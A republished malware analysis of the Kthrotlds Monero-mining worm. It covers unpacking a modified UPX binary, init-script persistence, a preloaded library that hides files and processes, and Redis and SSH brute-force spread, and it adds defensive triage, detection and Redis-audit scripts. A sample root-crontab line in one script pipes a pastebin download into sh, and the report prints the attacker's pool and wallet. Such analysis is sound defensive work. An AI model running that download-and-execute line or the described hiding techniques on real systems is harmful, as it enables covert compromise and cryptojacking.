2025-03-30 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/02 Report
This article walks through the analysis of the Kthrotlds mining malware: how the sample was unpacked and reversed, how it persists and hides itself, how it spreads, and how to harden against it.
On March 1, 2019, the Moan Technology Security Emergency Response Center received a call for help from a partner whose host had been infected. Zheng Sidun, a security researcher at Moan Technology, determined that the sample is a variant of the earlier watchdogs mining malware. It gains entry through Redis unauthenticated access and weak SSH passwords, drops a mining Trojan, and then launches Redis exploitation and SSH brute-force attacks against both intranet and internet hosts.
0x1 Characteristics of the virus
To determine whether a host is infected, check the following:
1. Check whether the key material in /root/.ssh/ has been cleared.
2. Check whether the scheduled tasks (crontab) contain the malicious entry, which fetches its script from https://pastebin.com/raw/D8E71JBJ (see the analysis below).
3. Check whether the kthrotlds and ksoftirqds processes are running.
4. Check whether a kthrotlds file exists in /usr/sbin.
5. Check whether a netdns file exists under /etc/init.d/.
6. The mining program consumes a large amount of host CPU once it runs.
7. Check whether libcset.so exists under /usr/local/lib/.
System maintainers should check their machines for the above indicators; if any are present, contact the Moan Technology Security Emergency Response Center for a removal tool.
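The checklist above can be run as a script. The following is an added example, not the article's or Moan Technology's tooling: the file paths, process names and the pastebin URL are the indicators the article names; the cron locations and /etc/ld.so.preload are the standard Linux locations for scheduled tasks and system-wide preloads, which the article does not name and are assumptions here. The `root` parameter lets the same checks run against a mounted disk image or a staged tree instead of the live system.

```python
"""Triage checks for the Kthrotlds indicators (added example, see lead-in)."""
import os
import tempfile

# Indicators named in the article.
IOC_FILES = ("usr/sbin/kthrotlds", "etc/init.d/netdns",
             "usr/local/lib/libcset.so", "usr/local/lib/libcset.c")
IOC_PROCESSES = {"kthrotlds", "ksoftirqds", "netdns"}
CRON_MARKERS = ("pastebin.com/raw/D8E71JBJ", "kthrotlds", "ksoftirqds")
# Assumption: standard cron locations (Debian and RHEL spools, /etc/cron.d).
CRON_PATHS = ("etc/crontab", "etc/cron.d", "var/spool/cron", "var/spool/cron/crontabs")


def _read(path):
    """File text, or '' when missing or unreadable."""
    try:
        with open(path, "r", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def _walk(path):
    """Yield the path if it is a file, or every file below it if a directory."""
    if os.path.isfile(path):
        yield path
    elif os.path.isdir(path):
        for name in sorted(os.listdir(path)):
            yield from _walk(os.path.join(path, name))


def check_files(root="/"):
    return ["/" + p for p in IOC_FILES if os.path.lexists(os.path.join(root, p))]


def check_cron(root="/"):
    """(file, line) pairs that reference the downloader URL or the dropped names."""
    hits = []
    for base in CRON_PATHS:
        for path in _walk(os.path.join(root, base)):
            for line in _read(path).splitlines():
                if any(marker in line for marker in CRON_MARKERS):
                    hits.append((path, line.strip()))
    return hits


def check_processes(root="/"):
    """pid -> comm for processes whose name is an indicator. This listing goes
    through libc readdir, which libcset.so hooks (see the libcset.c section),
    so an empty result on a live host is not conclusive on its own."""
    found, proc = {}, os.path.join(root, "proc")
    if os.path.isdir(proc):
        for entry in os.listdir(proc):
            if entry.isdigit():
                comm = _read(os.path.join(proc, entry, "comm")).strip()
                if comm in IOC_PROCESSES:
                    found[int(entry)] = comm
    return found


def check_ssh_dir(root="/"):
    """The article reports /root/.ssh being cleared: 'missing', 'empty' or the names present."""
    ssh = os.path.join(root, "root", ".ssh")
    if not os.path.isdir(ssh):
        return "missing"
    names = sorted(os.listdir(ssh))
    return "empty" if not names else "present:" + ",".join(names)


def check_preload(root="/"):
    """Lines of /etc/ld.so.preload mentioning libcset (assumed registration point)."""
    text = _read(os.path.join(root, "etc", "ld.so.preload"))
    return [line.strip() for line in text.splitlines() if "libcset" in line]


def triage(root="/"):
    return {"files": check_files(root), "cron": check_cron(root),
            "processes": check_processes(root), "ssh": check_ssh_dir(root),
            "preload": check_preload(root)}


def build_sample_root():
    """Constructed directory tree imitating an infected host, for offline testing.
    Contents are placeholders, not the real dropped files or cron line."""
    root = tempfile.mkdtemp(prefix="kthrotlds-demo-")
    files = {
        "usr/sbin/kthrotlds": "ELF placeholder",
        "etc/init.d/netdns": "#!/bin/bash\n# placeholder for the restart script\n",
        "usr/local/lib/libcset.so": "ELF placeholder",
        "etc/ld.so.preload": "/usr/local/lib/libcset.so\n",
        "var/spool/cron/root": "* * * * * curl -fsSL https://pastebin.com/raw/D8E71JBJ | sh\n",
        "proc/4242/comm": "kthrotlds\n",
        "proc/4243/comm": "ksoftirqds\n",
        "proc/1/comm": "init\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    os.makedirs(os.path.join(root, "root", ".ssh"))  # cleared key directory
    return root


if __name__ == "__main__":
    import json, sys
    print(json.dumps(triage(sys.argv[1] if len(sys.argv) > 1 else "/"), indent=2))
```

Run it as root against `/` on a suspect host, or against a mount point of an offline image; any non-empty `files`, `cron`, `processes` or `preload` result is a hit, and an `empty` or `missing` `ssh` result matches indicator 1.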
The analysis of the virus follows.
0x2 Analysis of kthrotlds
The analysis shows that the virus file is still UPX-packed, but the magic number in the UPX header has been modified:
Magic number in the virus file
Patching the magic number back is enough, as follows:
After the fix, unpack with upx -d
The packer has been removed successfully.
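The patch can be scripted. The following is an added example, not the article's tooling: the summary section of the article gives the modified magic as 4c 53 44 21 (ASCII "LSD!", matching the github.com/hippies/LSD package name in the binary) and the original as 55 50 58 21 ("UPX!"). The script replaces every occurrence and reports the offsets, because UPX stores the magic more than once in an ELF (the l_info header after the program headers and the PackHeader trailer at the end of the file), and because a four-byte sequence can also occur by chance inside compressed data, so the analyst should expect roughly one hit near the start and one near the end and look at anything else.

```python
"""Restore the patched UPX magic in a packed ELF (added example, see lead-in)."""
import sys

REAL_MAGIC = b"UPX!"              # 55 50 58 21
FAKE_MAGIC = b"\x4c\x53\x44\x21"  # 4c 53 44 21 == b"LSD!"


def find_magic(data, magic):
    """Offsets of every occurrence of ``magic`` in ``data``."""
    offsets, pos = [], data.find(magic)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(magic, pos + 1)
    return offsets


def restore_upx_magic(data, fake=FAKE_MAGIC, real=REAL_MAGIC):
    """Return (patched bytes, list of patched offsets).

    Every occurrence is replaced in place; the length is preserved so no
    other offsets in the file move. Offsets are returned so the analyst can
    sanity-check them against the expected header and trailer positions."""
    if len(fake) != len(real):
        raise ValueError("replacement must preserve length")
    if not data.startswith(b"\x7fELF"):
        raise ValueError("not an ELF file")
    offsets = find_magic(data, fake)
    buf = bytearray(data)
    for off in offsets:
        buf[off:off + len(real)] = real
    return bytes(buf), offsets


def fix_file(src, dst):
    """Write a repaired copy of ``src`` to ``dst`` and return the patched offsets."""
    with open(src, "rb") as fh:
        data = fh.read()
    patched, offsets = restore_upx_magic(data)
    with open(dst, "wb") as fh:
        fh.write(patched)
    return offsets


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: fix_upx_magic.py <packed> <out>   # then: upx -d <out>")
    hits = fix_file(sys.argv[1], sys.argv[2])
    print(f"patched {len(hits)} magic(s) at offsets {[hex(h) for h in hits]}")
```

After the repaired copy is written, `upx -d <out>` unpacks it as usual. If the count is much larger than two or three, inspect the extra offsets before trusting the result.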
Next, open it in IDA for decompilation.
The function names are all random strings. Judging from the strings, the program appears to be written in Go, like the previous version.
So we again need the Go symbol-restoration script used previously to recover the function names; the script is at:
https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro
After restoration:
Start with the main function. It does the following:
0x1 Writes the kthrotlds daemon script netdns to /etc/init.d/ and sets netdns to start at boot
0x2 Removes leftover files from earlier versions of the virus
0x3 Compiles libcset.c and registers the resulting library as a preloaded shared library
0x4 Writes the scheduled task and downloads the mining files remotely
0x5 Starts the ksoftirqds process for mining
0x6 Deletes ksoftirqds, kthrotlds, config.json, .lsdpid and similar files under /tmp
0x7 Updates the virus program
0x8 Performs Redis unauthenticated-access attacks and SSH brute-force attacks
First, kthrotlds copies /tmp/kthrotlds to /usr/sbin/kthrotlds through the github_com_hippies_LSD_LSDC_CopyFile function. It then writes a file named netdns to /etc/init.d/ and registers netdns as a startup item through the chkconfig command.
The netdns file does indeed exist in /etc/init.d:
Opening it in a text viewer shows that it is a bash script:
In short, it inspects the process list and, if it finds that the kthrotlds process has been killed, starts it again.
Back to the kthrotlds code:
Next come some cleanup operations, which appear to remove files left over from previous versions:
It then writes libcset.c to /usr/local/lib, compiles it into /usr/local/lib/libcset.so, and registers that .so as a preloaded shared library.
libcset.so is analyzed in the second half of the article; let's continue with the main function.
Next comes writing the scheduled task, dropping the mining Trojan ksoftirqds, and the update operation.
The commands written into its scheduled task are:
It fetches https://pastebin.com/raw/D8E71JBJ to obtain the virus execution script.
Decoding the base64-encoded data:
The script is not much different from the previous one. Here the file fetched with curl is renamed to kthrotlds (it was watchdogs originally).
For the details of the script, see the previous analysis article, which we will not repeat here:
https://www.anquanke.com/post/id/171692
0x3 Lateral propagation
Let's look at how the virus spreads laterally.
Redis attack
It traverses private and public IP ranges, attacking Redis servers:
Redis attacks captured with Wireshark on the test machine
main_main -> main_attack -> github_com_hippies_LSD_LSDA_Ago -> github_com_hippies_LSD_LSDA_Ago_func1 -> github_com_hippies_LSD_LSDA_runtwo -> github_com_hippies_LSD_LSDA_run -> github_com_gomodule_redigo_redis_DialTimeout -> github_com_gomodule_redigo_redis_Dial -> github_com_gomodule_redigo_redis__conn_Do -> github_com_gomodule_redigo_redis__conn_DoWithTimeout -> github_com_gomodule_redigo_redis__conn_writeCommand
Related code:
SSH brute force
SSH brute-force behaviour captured with Wireshark on the test machine:
Call sequence of the attack routine
main_main -> main_attack -> github_com_hippies_LSD_LSDA_Bbgo -> github_com_hippies_LSD_LSDA_bgo_func1 -> github_com_hippies_LSD_LSDA_cmdtwo -> github_com_hippies_LSD_LSDA_cmd -> golang_org_x_crypto_ssh_Client_NewSession
Related code
This is the entry point of the attack routine (main_attack). There are two attack modules, SSH brute force and Redis unauthenticated access, just as in the previous version.
0x4 Analysis of ksoftirqds
Let's look at the ksoftirqds file.
Analysis shows that it is still the xmr-stak miner.
The project is at:
https://github.com/fireice-uk/xmr-stak
Searching the strings reveals the mining pool address, which has changed.
The pool address is:
sg.minexmr.com:5555
Following further gives the wallet address.
The wallet ID is:
47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA
The income of the wallet account:
0x5 Analysis of libcset.c
kthrotlds compiles libcset.c, and the resulting /usr/local/lib/libcset.so is registered as a preloaded shared library.
The functions defined in libcset.c are:
It is clear that the library hides the virus's traces by hooking libc functions.
For example, the readdir function:
The readdir hook checks each entry against the virus process name (kthrotlds), the virus configuration file name, and the shared library name (libcset.so), and drops matching entries from the results. The other hooked functions are not analyzed further here.
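Because the filtering happens inside libc, every tool built on opendir/readdir (ls, ps, find) shows the same doctored view. The kernel's own directory listing does not pass through a preloaded library, so comparing it with the libc view exposes what the hook removes. The following is an added example, not from the article or the malware's author: it lists a directory with the getdents64 syscall via ctypes and diffs the result against os.listdir (which uses libc readdir). It is Linux-only and assumes the host is one of the architectures in the syscall-number table; the sample directory it creates is constructed for the test.

```python
"""Find directory entries hidden by a readdir hook (added example, see lead-in)."""
import ctypes
import os
import platform
import struct
import tempfile

# Assumption: getdents64 syscall numbers for the listed architectures.
_GETDENTS64 = {"x86_64": 217, "aarch64": 61, "riscv64": 61, "i686": 220, "i386": 220}
# struct linux_dirent64 header: d_ino, d_off, d_reclen, d_type; d_name follows.
_DIRENT64 = struct.Struct("=QqHB")
_libc = ctypes.CDLL(None, use_errno=True)
_libc.syscall.restype = ctypes.c_long


def raw_listdir(path):
    """List ``path`` with getdents64 directly, bypassing libc opendir/readdir."""
    nr = _GETDENTS64.get(platform.machine())
    if platform.system() != "Linux" or nr is None:
        raise OSError("raw_listdir needs Linux on a known architecture")
    fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY)
    buf = ctypes.create_string_buffer(64 * 1024)
    names = []
    try:
        while True:
            n = _libc.syscall(ctypes.c_long(nr), ctypes.c_long(fd), buf,
                              ctypes.c_long(ctypes.sizeof(buf)))
            if n < 0:
                err = ctypes.get_errno()
                raise OSError(err, os.strerror(err))
            if n == 0:
                break
            chunk, off = buf.raw[:n], 0
            while off < n:
                _ino, _doff, reclen, _dtype = _DIRENT64.unpack_from(chunk, off)
                raw_name = chunk[off + _DIRENT64.size:off + reclen]
                name = raw_name.split(b"\x00", 1)[0].decode("utf-8", "surrogateescape")
                if name not in (".", ".."):
                    names.append(name)
                off += reclen
    finally:
        os.close(fd)
    return names


def hidden_entries(path):
    """Names the kernel reports that libc readdir (os.listdir) does not.

    Candidates are re-checked with lstat to drop races such as a process that
    exited between the two listings. Caveat: a library that also hooks stat
    would defeat that re-check; the raw listing alone is the stronger signal."""
    via_syscall = set(raw_listdir(path))
    via_libc = set(os.listdir(path))
    return sorted(n for n in via_syscall - via_libc
                  if os.path.lexists(os.path.join(path, n)))


def hidden_pids():
    """PIDs that exist in /proc but are filtered out of readdir results."""
    return sorted(int(n) for n in hidden_entries("/proc") if n.isdigit())


def demo():
    """Constructed clean directory with the virus's file names: with no hook
    loaded both listings must agree and nothing is reported hidden."""
    d = tempfile.mkdtemp(prefix="readdir-check-")
    for name in ("kthrotlds", "config.json", ".lsdpid"):
        open(os.path.join(d, name), "w").close()
    return sorted(raw_listdir(d)), sorted(os.listdir(d)), hidden_entries(d)


if __name__ == "__main__":
    print("hidden pids in /proc:", hidden_pids())
    for d in ("/usr/sbin", "/usr/local/lib", "/tmp", "/etc/init.d"):
        if os.path.isdir(d):
            print(f"hidden in {d}:", hidden_entries(d))
```

On an infected host the `/proc` diff should surface the kthrotlds and ksoftirqds PIDs, and the `/usr/sbin` and `/usr/local/lib` diffs the dropped files; a clean host reports empty lists everywhere. Running the same check from a rescue system that does not load the host's /etc/ld.so.preload is the definitive fallback.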
0x6 Analysis summary
1. Compared with the previous watchdogs, the packing scheme has barely changed, but the program has been hardened slightly: the magic number of the UPX header was changed to 4c 53 44 21. The countermeasure is to restore it to 55 50 58 21 before unpacking.
2. SSH brute force and Redis attacks are used to spread laterally and grow the mining botnet.
3. It monitors the /bin directory with inotify, but unlike watchdogs it does not delete the netstat command.
4. The ksoftirqds program is the xmr-stak miner and mines Monero.
5. It compiles libcset.c and registers libcset.so as a preloaded shared library to hide virus-related information.
6. The previous version set the watchdogs program itself as a boot startup item; this version writes a script named netdns, sets it to start at boot, and uses it as the kthrotlds daemon.
7. Mining pool and wallet address:
Pool: sg.minexmr.com:5555
Wallet address:
47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA
8. Domain: https://pastebin.com (unchanged)
Corresponding IP: 104.20.209.21 (unchanged)
9. Related MD5 hashes (six 32-character values):
da7ee5683fb870bae61e9c4088a661e4
66613e2e4210dce89b562635b769bc21
83e651497c59a14ca8d5abab85565955
4c62c53ae69d8e9290aaccb5ee694716
f1bdc8b12f2ef0279cd265c79bd6fd9e
c7560dd3933774185ce19ddbee5e526c
0x6 Hardening suggestions
The virus is most likely implanted by exploiting Redis unauthenticated access, so please harden Redis.
About the Redis unauthenticated-access vulnerability: in its default configuration Redis binds the service to 0.0.0.0:6379, i.e. it is exposed to the public network. If authentication is not enabled as well, anyone can access the Redis service and operate on the database, and with further exploitation can obtain system privileges. (Redis 3.2 and later ship a protected mode that refuses remote connections when no bind address and no password are configured, but it is frequently switched off in deployments.)
Some hardening recommendations for Redis:
1. Modify the Redis configuration file to bind the service to the local address 127.0.0.1.
2. Modify redis.conf to enable password authentication (requirepass).
3. Restrict, at the firewall, which IPs may reach the Redis service.
4. Change the default Redis port.
5. Disable the CONFIG command (rename-command CONFIG "") so that even with unauthenticated access an attacker cannot abuse it.
6. Run the Redis service as an unprivileged user, so that an attacker who compromises the service gains only ordinary user privileges.
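Items 1, 2, 4 and 5 live in redis.conf and can be audited mechanically; the firewall rule and the service user (items 3 and 6) are outside the file. The following is an added example, not the article's tooling: it parses a redis.conf, reports which of those four items fail, and additionally flags protected-mode being turned off (a Redis 3.2+ setting the list does not mention). Both sample configurations are constructed for this example. Directive semantics follow the shipped redis.conf: a bind address prefixed with "-" is optional, and `rename-command CONFIG ""` removes the command entirely.

```python
"""Audit a redis.conf against the hardening list (added example, see lead-in)."""
import shlex

# Constructed: the exposed configuration the article describes.
WEAK_CONF = """\
bind 0.0.0.0
port 6379
protected-mode no
# requirepass foobared
"""

# Constructed: the same file after applying recommendations 1, 2, 4 and 5.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
port 16379
protected-mode yes
requirepass 0bbd9f2e4c7a4f6fa1d0c38e9e2b7d5e6c1a4f8b
rename-command CONFIG ""
"""

WILDCARD_BINDS = {"0.0.0.0", "::", "*"}


def parse_redis_conf(text):
    """Yield (directive, args) per non-comment line. redis.conf is whitespace
    separated with double-quoted arguments, which shlex splits correctly,
    including the empty string in rename-command CONFIG ""."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        yield parts[0].lower(), parts[1:]


def audit_redis_conf(text):
    """Return (code, detail) findings; an empty list means every check passed.
    Defaults mirror a Redis with no directive set: all interfaces, port 6379,
    no password, protected-mode yes, CONFIG available."""
    binds, port, password, protected, config_blocked = None, "6379", None, "yes", False
    for directive, args in parse_redis_conf(text):
        if directive == "bind":
            binds = args
        elif directive == "port" and args:
            port = args[0]
        elif directive == "requirepass" and args:
            password = args[0]
        elif directive == "protected-mode" and args:
            protected = args[0].lower()
        elif directive == "rename-command" and len(args) == 2 and args[0].upper() == "CONFIG":
            config_blocked = True  # renamed or removed; either hides the well-known name

    findings = []
    if binds is None:
        findings.append(("bind-all", "no bind directive: Redis listens on every interface"))
    elif any(addr.lstrip("-") in WILDCARD_BINDS for addr in binds):
        findings.append(("bind-all", f"bind {' '.join(binds)} exposes the service"))
    if not password:
        findings.append(("no-auth", "requirepass is unset: any client can run commands"))
    elif len(password) < 16:
        findings.append(("weak-auth", "requirepass is short enough to brute force"))
    if port == "6379":
        findings.append(("default-port", "port 6379 is the one scanners try first"))
    if not config_blocked:
        findings.append(("config-enabled", 'CONFIG is available; rename-command CONFIG "" disables it'))
    if protected != "yes":
        findings.append(("protected-mode-off", "protected-mode no removes the built-in safety net"))
    return findings


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_CONF
    for code, detail in audit_redis_conf(text) or [("ok", "all checks passed")]:
        print(f"{code:20} {detail}")
```

Run it as `python audit_redis_conf.py /etc/redis/redis.conf`; with no argument it audits the constructed weak sample and prints all five findings.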
0x7 Virus disposal measures
1) Moan Technology has developed an automated cleanup script for this virus, available at:
https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool
3) Use appropriate tools to check for Redis unauthenticated access across the network and harden servers so that infection is avoided at the source.
4) In an emergency, to avoid mass spread across the intranet, infected machines can be temporarily disconnected and isolated.
5) If business is not affected, it is advisable to temporarily delete .ssh/known_hosts and the SSH login key files on the machine.